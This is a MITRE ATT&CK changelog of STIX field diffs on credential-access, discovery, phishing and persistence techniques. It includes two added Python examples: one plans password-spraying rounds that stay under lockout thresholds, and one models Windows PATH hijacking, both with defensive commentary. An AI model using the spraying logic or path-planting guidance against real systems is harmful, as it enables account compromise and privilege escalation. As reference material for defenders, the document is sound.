| description | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) * SNMP (161/UDP and 162/TCP/UDP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. |
| external_references[1]['source_name'] | capec | Trend Micro Emotet 2020 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/49.html | https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/49.html', 'external_id': 'CAPEC-49'} | |
| x_mitre_contributors | Mohamed Kmal | |
| x_mitre_platforms | Network |
| Description |
|---|
| Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019) Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-21 17:58:03.269000+00:00 | 2022-03-25 13:18:55.310000+00:00 |
| external_references[2]['url'] | https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf | https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). | Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A) Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). |
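The description above names `net accounts /domain` as a discovery command and spells out how an adversary uses what it returns: drop candidates shorter than the minimum length, and keep guesses per account a couple below the lockout threshold. The following is an added example, not part of the ATT&CK description or this changelog, that parses a constructed `net accounts` listing (laid out the way the command prints it) into a policy and applies exactly those two rules, splitting a candidate list into rounds that must be separated by the lockout observation window so the per-account failure counter has reset. It is the logic a red team applies and the logic a defender should assume is being applied when choosing thresholds; the output text and candidate list are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed `net accounts /domain` output, formatted the way the command prints it.
NET_ACCOUNTS_OUTPUT = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          90
Minimum password length:                              8
Length of password history maintained:                24
Lockout threshold:                                    6
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""

# Constructed candidate list.
CANDIDATES = ["pass123", "Summer2022!", "Welcome1", "Password1", "Autumn2022", "qwerty", "Company2022!"]

_LINE = re.compile(r"^(?P<label>.+?):\s{2,}(?P<value>.+?)\s*$")
_WANTED = {
    "Minimum password length": "min_length",
    "Lockout threshold": "lockout_threshold",
    "Lockout observation window (minutes)": "observation_minutes",
    "Lockout duration (minutes)": "lockout_minutes",
    "Length of password history maintained": "history",
}


def parse_net_accounts(text: str) -> Dict[str, Optional[int]]:
    """Map the labels that matter to integers; 'Never' (no lockout) becomes None."""
    policy: Dict[str, Optional[int]] = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m or m["label"] not in _WANTED:
            continue
        value = m["value"]
        policy[_WANTED[m["label"]]] = None if value.lower() == "never" else int(value)
    return policy


def policy_compliant(words: List[str], policy: Dict[str, Optional[int]]) -> List[str]:
    """Drop guesses the policy guarantees cannot currently be anyone's password."""
    min_len = policy.get("min_length") or 0
    return [w for w in words if len(w) >= min_len]


def plan_rounds(words: List[str], policy: Dict[str, Optional[int]], safety_margin: int = 2) -> List[List[str]]:
    """Chunk guesses into rounds of (threshold - margin) per account. Rounds must
    be spaced by the observation window so the failure counter resets; with no
    lockout threshold at all, everything fits in one round."""
    threshold = policy.get("lockout_threshold")
    per_round = len(words) if threshold is None else max(1, threshold - safety_margin)
    return [words[i:i + per_round] for i in range(0, len(words), per_round)]


if __name__ == "__main__":
    pol = parse_net_accounts(NET_ACCOUNTS_OUTPUT)
    usable = policy_compliant(CANDIDATES, pol)
    print(pol)
    print(plan_rounds(usable, pol), "minutes between rounds:", pol["observation_minutes"])
```

With a threshold of 6, four guesses per account per round is the adversary's safe budget, so a defender alerting on "N failures per account" at or near the lockout threshold will see nothing; alerting on failures per source across many accounts, or on a low per-account count inside the observation window, is what actually catches the pattern.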
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 14:11:39.499000+00:00 | 2022-09-06 22:01:45.067000+00:00 |
| description | Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). | Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A) Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). |
| external_references[1]['source_name'] | Superuser Linux Password Policies | AWS GetPasswordPolicy |
| external_references[1]['description'] | Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018. | Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021. |
| external_references[1]['url'] | https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu | https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html |
| external_references[3]['source_name'] | AWS GetPasswordPolicy | Superuser Linux Password Policies |
| external_references[3]['description'] | Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021. | Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018. |
| external_references[3]['url'] | https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html | https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu |
| x_mitre_contributors[1] | Isif Ibrahima | Sudhanshu Chauhan, @Sudhanshu_C |
| x_mitre_contributors[2] | Sudhanshu Chauhan, @Sudhanshu_C | Isif Ibrahima, Mandiant |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network |
| Description |
|---|
| Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. |
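The description above explains the search order that makes PATH interception work and gives the `C:\example path` / `net.exe` case. The following is an added example, not part of the ATT&CK description or this changelog, that models that lookup offline: it enumerates candidates in the order cmd.exe tries them (current directory if given, then each PATH entry, with every PATHEXT suffix tried per directory for a bare name) against a constructed, case-insensitive view of the filesystem, and includes the audit check a defender actually wants, namely which PATH entries are searched ahead of System32. The directories, files and PATH value are constructed; the lookup rules are Windows' own.

```python
import ntpath
from typing import Dict, List, Optional, Set

# Constructed filesystem view: lower-cased directory -> files present.
# Windows name lookup is case-insensitive, so all comparisons are lower-cased.
FS: Dict[str, Set[str]] = {
    r"c:\example path": {"net.exe"},                               # user-writable, listed first
    r"c:\windows\system32": {"net.exe", "cmd.exe", "whoami.exe"},
    r"c:\windows": {"explorer.exe"},
}
PATH = r"C:\example path;C:\Windows\system32;C:\Windows"
PATHEXT = ".COM;.EXE;.BAT;.CMD"


def search_order(command: str, path: str = PATH, pathext: str = PATHEXT,
                 cwd: Optional[str] = None) -> List[str]:
    """Candidates in the order cmd.exe tries them: the current directory (if
    given), then each PATH entry; a bare name gets every PATHEXT suffix per dir."""
    dirs = ([cwd] if cwd else []) + [d for d in path.split(";") if d]
    if ntpath.splitext(command)[1]:
        names = [command]
    else:
        names = [command + ext for ext in pathext.split(";")]
    return [ntpath.join(d, n) for d in dirs for n in names]


def resolve(command: str, fs: Dict[str, Set[str]] = FS, path: str = PATH,
            pathext: str = PATHEXT, cwd: Optional[str] = None) -> Optional[str]:
    """The first candidate that exists wins, which is why an earlier PATH entry
    shadows the System32 binary of the same name."""
    for cand in search_order(command, path, pathext, cwd):
        directory, name = ntpath.split(cand)
        if name.lower() in {f.lower() for f in fs.get(directory.lower(), set())}:
            return cand
    return None


def entries_before_system32(path: str = PATH, system_root: str = r"C:\Windows") -> List[str]:
    """Audit: directories searched ahead of System32. Any of these that a
    standard user can write to is a planting spot for a look-alike binary."""
    sys32 = ntpath.join(system_root, "system32").lower()
    ahead: List[str] = []
    for d in path.split(";"):
        if d.lower().rstrip("\\") == sys32:
            break
        if d:
            ahead.append(d)
    return ahead


if __name__ == "__main__":
    print(resolve("net"))             # the planted copy in C:\example path
    print(resolve("cmd"))             # the real System32 binary
    print(entries_before_system32())  # entries worth an ACL check
```

Reordering PATH so that `C:\example path` follows System32 makes `resolve("net")` return the System32 copy again, which is the fix; on a live host, pair `entries_before_system32` with an ACL check (for example `icacls`) on each directory it returns, and prefer full paths in scripts so PATH is never consulted.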
New Detections:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 16:56:34.583000+00:00 | 2022-05-05 04:08:56.402000+00:00 |
| x_mitre_data_sources[1] | File: File Modification | Process: Process Creation |
| x_mitre_data_sources[2] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Description |
|---|
| Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018. | |
| external_references | CAPEC-38 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-38 | |
| external_references | absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-17 19:05:23.755000+00:00 | 2022-10-18 20:51:38.118000+00:00 |
| external_references[1]['source_name'] | capec | Windows Privilege Escalation Guide |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/38.html | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
| external_references[2]['source_name'] | Microsoft CurrentControlSet Services | Windows Unquoted Services |
| external_references[2]['description'] | Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020. | HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree | https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ |
| external_references[4]['source_name'] | Windows Unquoted Services | Microsoft CurrentControlSet Services |
| external_references[4]['description'] | HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018. | Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020. |
| external_references[4]['url'] | https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree |
| external_references[5]['source_name'] | Windows Privilege Escalation Guide | capec |
| external_references[5]['url'] | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ | https://capec.mitre.org/data/definitions/38.html |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. | Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-26 17:42:03.337000+00:00 | 2022-03-11 18:39:11.763000+00:00 |
| description | Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. | Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Peripheral Discovery Linux', 'description': 'Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.', 'url': 'https://linuxhint.com/list-usb-devices-linux/'} | |
| external_references | {'source_name': 'Peripheral Discovery macOS', 'description': 'SS64. (n.d.). system_profiler. Retrieved March 11, 2022.', 'url': 'https://ss64.com/osx/system_profiler.html'} | |
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_platforms | Linux |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 17:39:13.604000+00:00 | 2022-01-04 13:57:16.959000+00:00 |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| Description |
|---|
| Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:43:13.134000+00:00 | 2022-03-08 21:57:56.078000+00:00 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. | Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 01:26:31.804000+00:00 | 2022-03-11 18:31:23.996000+00:00 |
| description | Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. | Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. |
| Old Description | New Description |
|---|---|
| Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. | Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.<br>The Registry key contains entries for the following:<br>* Local Port<br>* Standard TCP/IP Port<br>* USB Monitor<br>* WSD Port<br>Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-01-24 19:46:27.750000+00:00 | 2022-04-20 16:36:31.835000+00:00 |
| description | Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.<br>The Registry key contains entries for the following:<br>* Local Port<br>* Standard TCP/IP Port<br>* USB Monitor<br>* WSD Port<br>Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. | Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.<br>The Registry key contains entries for the following:<br>* Local Port<br>* Standard TCP/IP Port<br>* USB Monitor<br>* WSD Port<br>Adversaries can use this 